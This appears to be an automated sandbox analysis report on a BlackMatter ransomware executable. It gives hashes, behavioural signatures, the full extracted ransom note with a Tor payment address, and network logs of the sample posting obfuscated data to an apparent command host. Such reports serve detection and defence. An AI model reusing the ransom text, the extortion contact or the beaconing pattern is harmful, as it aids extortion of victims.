Overview

overview

10

Static

static

10

22d7d67c3a...d6.exe

windows7_x64

10

22d7d67c3a...d6.exe

windows10_x64

10

Analysis

  • max time kernel
    119s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    23-11-2021 11:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe

  • Size

    67KB

  • MD5

    598c53bfef81e489375f09792e487f1a

  • SHA1

    80a29bd2c349a8588edf42653ed739054f9a10f5

  • SHA256

    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6

  • SHA512

    6a82ad5009588d2fa343bef8d9d2a02e2e76eec14979487a929a96a6b6965e82265a69ef8dd29a01927e9713468de3aedd7b5ee5e79839a1a50649855a160c35

Score
10/10
blackmatterransomware

Malware Config

Extracted

Path

C:\eeWDzMyD5.README.txt

Family

blackmatter

Ransom Note
~+ * + ' BLACK | () .-.,='``'=. - o - '=/_ \ | * | '=._ | \ `=./`, ' . '=.__.=' `=' * + Matter + O * ' . >>> What happens? Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver. We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data. >>> What guarantees? We are not a politically motivated group and we do not need anything other than your money. If you pay, we will provide you the programs for decryption and we will delete your data. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. We always keep our promises. >> Data leak includes 1. Full emloyeers personal data 2. Network information 3. Schemes of buildings, active project information, architect details and contracts, 4. Finance info >>> How to contact with us? 1. Download and install TOR Browser (https://www.torproject.org/). 2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV. >>> Warning! Recovery recommendations. We strongly recommend you to do not MODIFY or REPAIR your files, that will damage them.
URLs

http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV

Signatures

  • BlackMatter Ransomware

    BlackMatter ransomware group claims to be Darkside and REvil succesor.

    ransomwareblackmatter
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Modifies Control Panel 3 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    "C:\Users\Admin\AppData\Local\Temp\22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies Control Panel
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2632
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2208

Network

  • flag-us
    DNS
    paymenthacks.com
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    8.8.8.8:53
    Request
    paymenthacks.com
    IN A
    Response
    paymenthacks.com
    IN A
    103.224.212.222
  • flag-us
    POST
    https://paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    103.224.212.222:443
    Request
    POST /?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94 HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    Content-Type: text/plain
    User-Agent: Firefox/89.0
    Host: paymenthacks.com
    Content-Length: 853
    Cache-Control: no-cache
    Response
    HTTP/1.1 302 Found
    Date: Tue, 23 Nov 2021 11:06:34 GMT
    Server: Apache/2.4.25 (Debian)
    Set-Cookie: __tad=1637665594.1560302; expires=Fri, 21-Nov-2031 11:06:34 GMT; Max-Age=315360000
    Location: http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3491-8c29-81ae9efc1874
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    ww25.paymenthacks.com
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    8.8.8.8:53
    Request
    ww25.paymenthacks.com
    IN A
    Response
    ww25.paymenthacks.com
    IN CNAME
    77026.bodis.com
    77026.bodis.com
    IN A
    199.59.242.153
  • flag-us
    GET
    http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3491-8c29-81ae9efc1874
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    199.59.242.153:80
    Request
    GET /?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3491-8c29-81ae9efc1874 HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    User-Agent: Firefox/89.0
    Cache-Control: no-cache
    Host: ww25.paymenthacks.com
    Cookie: __tad=1637665594.1560302
    Response
    HTTP/1.1 200 OK
    Server: openresty
    Date: Tue, 23 Nov 2021 11:06:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: parking_session=70fca3d5-b0e7-bbfb-c656-f95540f31937; expires=Tue, 23-Nov-2021 11:21:35 GMT; Max-Age=900; path=/; HttpOnly
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_YfUkHW2CNxsqE2mX6CZwKfN2S69/N1S55APHO93GjwUpR0+EfhC+8LW8MdZ6e+ChTil90aGBycV3lPFkU/rVlg==
    Cache-Control: no-cache
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Cache-Control: no-store, must-revalidate
    Cache-Control: post-check=0, pre-check=0
    Pragma: no-cache
    Content-Encoding: gzip
  • flag-us
    POST
    http://paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    103.224.212.222:80
    Request
    POST /?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94 HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    Content-Type: text/plain
    User-Agent: Firefox/89.0
    Host: paymenthacks.com
    Content-Length: 853
    Cache-Control: no-cache
    Cookie: __tad=1637665594.1560302
    Response
    HTTP/1.1 302 Found
    Date: Tue, 23 Nov 2021 11:06:35 GMT
    Server: Apache/2.4.25 (Debian)
    Location: http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3558-8060-76b2b34a1a3f
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-us
    GET
    http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3558-8060-76b2b34a1a3f
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    199.59.242.153:80
    Request
    GET /?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3558-8060-76b2b34a1a3f HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    User-Agent: Firefox/89.0
    Cache-Control: no-cache
    Host: ww25.paymenthacks.com
    Cookie: __tad=1637665594.1560302; parking_session=70fca3d5-b0e7-bbfb-c656-f95540f31937
    Response
    HTTP/1.1 200 OK
    Server: openresty
    Date: Tue, 23 Nov 2021 11:06:36 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: parking_session=70fca3d5-b0e7-bbfb-c656-f95540f31937; expires=Tue, 23-Nov-2021 11:21:36 GMT; Max-Age=900; path=/; HttpOnly
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_f0Eh9D/OalvPDVSONUVsPVDWIqHaODBpHwZOXpj4rExwVrbWyH+GERoLwzJcpfx2evejpmR7lYXvt37BOIDMnA==
    Cache-Control: no-cache
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Cache-Control: no-store, must-revalidate
    Cache-Control: post-check=0, pre-check=0
    Pragma: no-cache
    Content-Encoding: gzip
  • flag-us
    DNS
    mojobiden.com
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    8.8.8.8:53
    Request
    mojobiden.com
    IN A
    Response
  • flag-us
    POST
    https://paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    103.224.212.222:443
    Request
    POST /?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    Content-Type: text/plain
    User-Agent: Firefox/89.0
    Host: paymenthacks.com
    Content-Length: 657
    Cache-Control: no-cache
    Cookie: __tad=1637665594.1560302
    Response
    HTTP/1.1 302 Found
    Date: Tue, 23 Nov 2021 11:06:38 GMT
    Server: Apache/2.4.25 (Debian)
    Location: http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3893-a9aa-932565da47dd
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-us
    GET
    http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3893-a9aa-932565da47dd
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    199.59.242.153:80
    Request
    GET /?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3893-a9aa-932565da47dd HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    User-Agent: Firefox/89.0
    Cache-Control: no-cache
    Host: ww25.paymenthacks.com
    Cookie: __tad=1637665594.1560302; parking_session=70fca3d5-b0e7-bbfb-c656-f95540f31937
    Response
    HTTP/1.1 200 OK
    Server: openresty
    Date: Tue, 23 Nov 2021 11:06:38 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: parking_session=70fca3d5-b0e7-bbfb-c656-f95540f31937; expires=Tue, 23-Nov-2021 11:21:38 GMT; Max-Age=900; path=/; HttpOnly
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_y6AZQrJQbSmbaISgHEtYIskp93Xj7gDgZFLPXOIMHCV3BhUpCdRX4dvpX/r+AWC3YRxDI/qTyI8NyjFgKgzLGw==
    Cache-Control: no-cache
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Cache-Control: no-store, must-revalidate
    Cache-Control: post-check=0, pre-check=0
    Pragma: no-cache
    Content-Encoding: gzip
  • flag-us
    POST
    http://paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    103.224.212.222:80
    Request
    POST /?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    Content-Type: text/plain
    User-Agent: Firefox/89.0
    Host: paymenthacks.com
    Content-Length: 657
    Cache-Control: no-cache
    Cookie: __tad=1637665594.1560302
    Response
    HTTP/1.1 302 Found
    Date: Tue, 23 Nov 2021 11:06:38 GMT
    Server: Apache/2.4.25 (Debian)
    Location: http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3877-b811-d79b46f7f999
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-us
    GET
    http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3877-b811-d79b46f7f999
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    Remote address:
    199.59.242.153:80
    Request
    GET /?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3877-b811-d79b46f7f999 HTTP/1.1
    Accept: */*
    Connection: keep-alive
    Accept-Encoding: gzip, deflate, br
    User-Agent: Firefox/89.0
    Cache-Control: no-cache
    Host: ww25.paymenthacks.com
    Cookie: __tad=1637665594.1560302; parking_session=70fca3d5-b0e7-bbfb-c656-f95540f31937
    Response
    HTTP/1.1 200 OK
    Server: openresty
    Date: Tue, 23 Nov 2021 11:06:39 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: parking_session=70fca3d5-b0e7-bbfb-c656-f95540f31937; expires=Tue, 23-Nov-2021 11:21:39 GMT; Max-Age=900; path=/; HttpOnly
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_gayzfP/+bnl4x1xtmXm5NFFgOQ1/LmfW/T8YUhkq2qY6V0z/m8gq83AAeWYBw2ijKn+6D46S/XtqpvWPRUF95g==
    Cache-Control: no-cache
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Cache-Control: no-store, must-revalidate
    Cache-Control: post-check=0, pre-check=0
    Pragma: no-cache
    Content-Encoding: gzip
  • flag-us
    DNS
    time.windows.com
    Remote address:
    8.8.8.8:53
    Request
    time.windows.com
    IN A
    Response
    time.windows.com
    IN CNAME
    twc.trafficmanager.net
    twc.trafficmanager.net
    IN A
    20.101.57.9
  • 103.224.212.222:443
    https://paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94
    tls, http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    2.6kB
     7.6kB
     17
    11

    HTTP Request

    POST https://paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94

    HTTP Response

    302
  • 199.59.242.153:80
    http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3491-8c29-81ae9efc1874
    http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    988 B
     2.7kB
     8
    5

    HTTP Request

    GET http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3491-8c29-81ae9efc1874

    HTTP Response

    200
  • 103.224.212.222:80
    http://paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94
    http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    1.8kB
     877 B
     7
    6

    HTTP Request

